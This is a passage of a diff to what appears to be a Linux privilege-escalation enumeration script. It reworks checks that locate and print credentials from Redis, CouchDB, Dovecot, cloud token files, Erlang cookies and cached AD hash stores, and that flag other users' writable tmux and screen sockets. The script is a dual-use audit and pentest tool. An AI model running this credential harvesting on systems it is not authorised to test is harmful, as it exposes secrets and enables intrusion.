done; echo ""; +elif [ "$DEBUG" ]; then echo_not_found +fi + +if [ "$PSTORAGE_KNOCKD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Knockd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi - print_2title "Analyzing Kibana Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_KIBANA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Kibana Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kibana.y*ml"; fi; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing Elasticsearch Files (limit 70)" +if [ "$PSTORAGE_ELASTICSEARCH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Elasticsearch Files (limit 70)" echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" - if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "elasticsearch.y*ml"; fi; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; +fi - ##-- SI) Logstash - print_2title "Searching logstash files" - if [ "$PSTORAGE_LOGSTASH" ]; then - printf "$PSTORAGE_LOGSTASH\n" - printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do - if [ -r "$d/startup.options" ]; then - echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," - fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," - done - else echo_not_found - fi - echo "" +##-- SI) Logstash +print_2title "Searching logstash files" +if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then + printf "$PSTORAGE_LOGSTASH" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +elif [ "$DEBUG" ]; then echo_not_found +fi +echo "" - #-- SI) Vault-ssh +#-- SI) Vault-ssh +if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then print_2title "Searching Vault-ssh files" - if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then - printf "$PSTORAGE_VAULT_SSH_HELPER\n" - printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done - echo "" - vault secrets list 2>/dev/null - printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - else echo_not_found "vault-ssh-helper.hcl" - fi + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +elif [ "$DEBUG" ]; then echo_not_found "vault-ssh-helper.hcl" +fi +echo "" - #-- SI) Cached AD Hashes - adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +#-- SI) Cached AD Hashes +adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +if [ "$adhashes" ] || [ "$DEBUG" ]; then print_2title "Searching AD cached hashes" - if [ "$adhashes" ]; then - ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null - else echo_not_found "cached hashes" - fi + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - #-- SI) Screen sessions +#-- SI) Screen sessions +if [ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]; then print_2title "Searching screen sessions" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" screensess=$(screen -ls 2>/dev/null) - if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," - else echo_not_found "screen" - fi + screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null) + + screen -v + printf "$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," + + find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do + echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," + done echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - #-- SI) Tmux sessions - tmuxdefsess=$(tmux ls 2>/dev/null) - tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +#-- SI) Tmux sessions +tmuxdefsess=$(tmux ls 2>/dev/null) +tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null) +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]; then print_2title "Searching tmux sessions"$N print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," - else echo_not_found "tmux" - fi + tmux -V + printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," + + find /tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do + echo "Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," + done echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - print_2title "Analyzing CouchDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_COUCHDB" ] || [ "$DEBUG" ]; then + print_2title "Analyzing CouchDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "couchdb"; fi; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; find "$f" -name "local.ini" | while read ff; do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; +fi - print_2title "Analyzing Redis Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Redis Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; +fi - #-- SI) Dovecot - # Needs testing +#-- SI) Dovecot +# Needs testing +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ "$dovecotpass" ] || [ "$DEBUG" ]; then print_2title "Searching dovecot files" - dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then + if [ -z "$dovecotpass" ]; then echo_not_found "dovecot credentials" else - for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + printf "%s\n" "$dovecotpass" | while read d; do df=$(echo $d |cut -d ':' -f1) dp=$(echo $d |cut -d ':' -f2-) echo "Found possible PLAIN text creds in $df" echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - done - fi + done + fi echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - print_2title "Analyzing Mosquitto Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_MOSQUITTO" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Mosquitto Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mosquitto.conf"; fi; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing Neo4j Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_NEO4J" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Neo4j Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "neo4j"; fi; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; find "$f" -name "auth" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi - print_2title "Analyzing Cloud Credentials Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then echo_not_found "access_tokens.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then echo_not_found "access_tokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then echo_not_found "accessTokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then echo_not_found "azureProfile.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then echo_not_found "TokenCache.dat"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then echo_not_found "AzureRMContext.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cloud Credentials Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "azureProfile.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name "config.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi - print_2title "Analyzing Cloud Init Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_CLOUD_INIT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cloud Init Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cloud.cfg"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing CloudFlare Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; +if [ "$PSTORAGE_CLOUDFLARE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing CloudFlare Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cloudflared"; fi; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; +fi - print_2title "Analyzing Erlang Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_ERLANG" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Erlang Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".erlang.cookie"; fi; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing GMV Auth Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_GMV_AUTH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing GMV Auth Files (limit 70)" + if ! [ "`echo 